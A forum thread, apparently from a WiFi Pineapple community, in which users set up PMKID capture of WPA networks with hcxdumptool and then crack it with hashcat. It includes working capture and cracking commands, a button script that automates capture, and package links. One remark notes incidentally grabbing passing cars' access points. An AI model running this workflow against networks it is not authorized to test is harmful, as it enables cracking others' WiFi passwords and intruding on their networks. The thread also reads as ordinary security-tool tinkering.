pmkid PMKID Attack on WiFi Pineapples

[Just_a_User]

5 minutes ago, Zylla said:

So just a heads up that it might be a while until updates are coming, and the module i had started working on.

Ahhh man that sucks, hopefully you get back on track ASAP. Enjoy the break away from keyboard? ?

[Sleezybax]

@Zylla

Depending on which specs you are looking for, I might have one i could ship your way.

[Zylla]

9 hours ago, Just_a_User said:

Ahhh man that sucks, hopefully you get back on track ASAP. Enjoy the break away from keyboard? ?

Thanks. I'm hoping to get back on track asap. ?

@Sleezybax
That'd be really helpful. I got some components myself that could boost performance, like RAM and SSD-disks laying around.
I'm not looking for a beast-laptop for gaming and such. But still something that's stable and works.
Like, if i was to purchase a new one today in the stores, i'd probably focus on the CPU.
Do you have any details on the "asset" you mentioned? ?
Thanks a lot for attempting to help out ? 

[PixL]

Ok once i've captured a .pcapng file how can I find out what SSIDs it has captured details for?   Or do I have to manually compare BSSIDs?

[Just_a_User]

2 minutes ago, PixL said:

Ok once i've captured a .pcapng file how can I find out what SSIDs it has captured details for?   Or do I have to manually compare BSSIDs? 

When you convert to *.16800 you can cat the file and see each MAC/BSSID but no ESSID.

I started using filters to be more targeted against my test AP's

e.g.

hcxdumptool -o /root/PMKIDS/local.pcapng -i wlan1mon --enable_status 4 --filterlist /root/targetlist.txt --filtermode 2

This thing is so fast it can pick up car AP;s before they are out of range if your not careful ?

[PixL]

19 minutes ago, Just_a_User said:

This thing is so fast it can pick up car AP;s before they are out of range if your not careful ?

Only thing limiting it would be which channel it was scanning at the time I guess.

[Just_a_User]

2 minutes ago, PixL said:

Only thing limiting it would be which channel it was scanning at the time I guess.

yup, default is 5s per chan but can be dialed down further.

[PixL]

What i'm unsure of is if there is any difference to using:

1.hcxpcaptool -z test.16800 test.pcapng   then using   hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

or

2. hcxpcaptool -o test.hccapx test.pcapng    then using hashcat -m 2500 test.hccapx -a 3 -w 3 '?l?l?l?l?l?lt!'

[Just_a_User]

7 hours ago, PixL said:

What i'm unsure of is if there is any difference to using:

1.hcxpcaptool -z test.16800 test.pcapng   then using   hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

or

2. hcxpcaptool -o test.hccapx test.pcapng    then using hashcat -m 2500 test.hccapx -a 3 -w 3 '?l?l?l?l?l?lt!'

hashcat forum thread says

Quote

There's also support for hash-mode 16801, which allows skipping the computation of the PMK - which is the computation that makes cracking WPA so slow.

 

[PixL]

Just_a_User: 

 

Actually this is not what I mean, 16801 means you supply hashcat with pre-hashed PMKs as hex strings.  My above question is about 16800 which is expecting normal text file of passwords.

[Just_a_User]

1 hour ago, PixL said:

Just_a_User: 

 

Actually this is not what I mean, 16801 means you supply hashcat with pre-hashed PMKs as hex strings.  My above question is about 16800 which is expecting normal text file of passwords.

Oh shoot my bad,  All i found so far is hash-mode 16800 = WPA-PMKID-PBKDF2.

[PixL]

22 hours ago, PixL said:

Ok once i've captured a .pcapng file how can I find out what SSIDs it has captured details for?   Or do I have to manually compare BSSIDs?

Ok i've answered my own question, take the converted test.16800 file, open in notepad and then copy the last column from each line (delimited by *) and run it from hex to ascii...... voila you get your SSID.

[PixL]

On 8/22/2018 at 10:34 PM, Just_a_User said:

Just a note, new version on tetra is backin action and the filters work a treat ? this thing is so, so fast its amazing really. And perfect for the pineapples button script

#!/bin/bash
file="/tmp/handshake"
capture="`head -30 /dev/urandom | tr -dc "0123456789" | head -c3`"
if [ -f "$file" ]
then
        killall hcxdumptool
        led YELLOW off
        rm -rf /tmp/handshake
        hcxpcaptool -z test.16800 test.pcapng > test.conlog
        mv test.pcapng /root/$capture.pcapng
        mv test.16800 /root/$capture.16800
        mv test.conlog /root/$capture.conlog
        mv test.log /root/$capture.log

else
        touch /tmp/handshake
        led YELLOW on
        hcxdumptool -o test.pcapng -t 2 -i wlan1mon --enable_status=3 --disable_deauthentications --disable_disassociations > test.log &
fi

1. Click once and it starts capturing PMKID and light yellow LED

2. Click again and it stops capturing, converts the data to 16800 and moves them to /root/random.pcapng and /root/random.16800, turns off yellow LED and dumps a /root/random.log with the hcxdumptool output and random.conlog with the hcxpcaptool output.

[PixL]

Ok so i've made a small script to convert the hex encoded SSID back to text... can anyone improve on this and maybe make something that will take a list of PMKIDs and convert to a list of SSIDs?

#!/bin/bash
function hex2string () {
  I=0
  while [ $I -lt ${#1} ];
  do
    echo -en "\x"${1:$I:2}
    let "I += 2"
  done
}
read -p 'Hexstring: ' varname
hex2string "$varname"

 

[cheeto]

Hey guys,

Has anyone actually tried installing this in OS like Kali, Ubuntu?

If so, can you tell me what version of the OS worked for you?   I simply can't get this to work on Kali or Ubuntu. (raspberry pi 3b+ version)

thanks!

 

[Sleezybax]

@Zylla

Sorry for the late reply, got hit by RL. Had a dig through the basement, was sure i still had a lenovo t420 laying around. Turns out all i got left of old stuff is an acer something with just a i3 in it. So if CPU is what you are looking for i doubt this one will be worth shipping.

[Zylla]

On 9/2/2018 at 7:05 PM, cheeto said:

Hey guys,

Has anyone actually tried installing this in OS like Kali, Ubuntu?

If so, can you tell me what version of the OS worked for you?   I simply can't get this to work on Kali or Ubuntu. (raspberry pi 3b+ version)

thanks!

 

It was working perfectly on my Kali installation, until my laptop died. 

I have an RPI3B+, and I haven't tested it there myself, it should be working on it according to the developer. (ZerBea) 

Check if you have all dependencies installed before compiling. ?

[g0blin]

Thanks for this! I had some good fun with a friend creating a module to expose these tools on the Nano today. I'll see if I can tidy it up in to something presentable for the end of the week.

[Zylla]

I would also like to notify people (since it's been discussed earlier in the thread) that i was able to cmopile this without any problems on my Raspberry Pi 3b+.
And it's working perfectly. ?

[g0blin]

FYI, I don't seem to be getting any successful captures on the most recent packages you uploaded. I'm just testing the previous version to see if I've done something weird on my Pineapple.

[g0blin]

Just reverted back to these versions, and am capturing ok now.

https://github.com/adde88/hcxtools-hcxdumptool-openwrt/raw/b23ae47fa5a9c5d137a0627459cbf0f8a5a1ba4b/bin/ar71xx/packages/base/hcxdumptool_4.2.1-8_ar71xx.ipk
https://github.com/adde88/hcxtools-hcxdumptool-openwrt/raw/cea232511fb6de3b4b71d3b07b8181bb55145a2b/bin/ar71xx/packages/base/hcxtools_4.2.1-9_ar71xx.ipk

[g0blin]

Had a go at creating a Module that makes use of these binaries - here's what I came up with: https://github.com/hackthebox/PMKID

All feedback appreciate! Thanks to @Zylla! ?

[cheeto]

12 hours ago, Zylla said:

I would also like to notify people (since it's been discussed earlier in the thread) that i was able to cmopile this without any problems on my Raspberry Pi 3b+.
And it's working perfectly. ?

Congrats!!!

You wouldn't happen to have the link to the version of Kali that works on the Raspberry Pi 3b+,

I have Kali on my 3b+ but i think it's a patched up version.

It's my understanding that there is no official version of Kali  for 3b+.  Instead it's a modified version from the RP 3.  Right?

Also, Doesn't PMKID require more GPU?  If that's the case, i would imagine that's it's pretty slow on the the Nano ans the RP3b+.

 

Thanks!!

[Zylla]

5 hours ago, cheeto said:

Congrats!!!

You wouldn't happen to have the link to the version of Kali that works on the Raspberry Pi 3b+,

I have Kali on my 3b+ but i think it's a patched up version.

It's my understanding that there is no official version of Kali  for 3b+.  Instead it's a modified version from the RP 3.  Right?

Also, Doesn't PMKID require more GPU?  If that's the case, i would imagine that's it's pretty slow on the the Nano ans the RP3b+.

 

Thanks!!

Kali is based on Debian, the only "modified versions" I can think of is the images you can download containing the Nexmon patches, making you able to run wlan0 in monitor-mode (and AP mode at the same time) 

But that's just a kernel patch. 

Here's link for a great version: https://re4son-kernel.com/re4son-pi-kernel/

And yeah, same with the Pineapple. You don't use hashcat on these devices to crack the PMKID, you transfer the captures from the device to your desktop which hopefully has a GPU or something ?

[Zylla]

@g0blin

The recent versions don't work? ?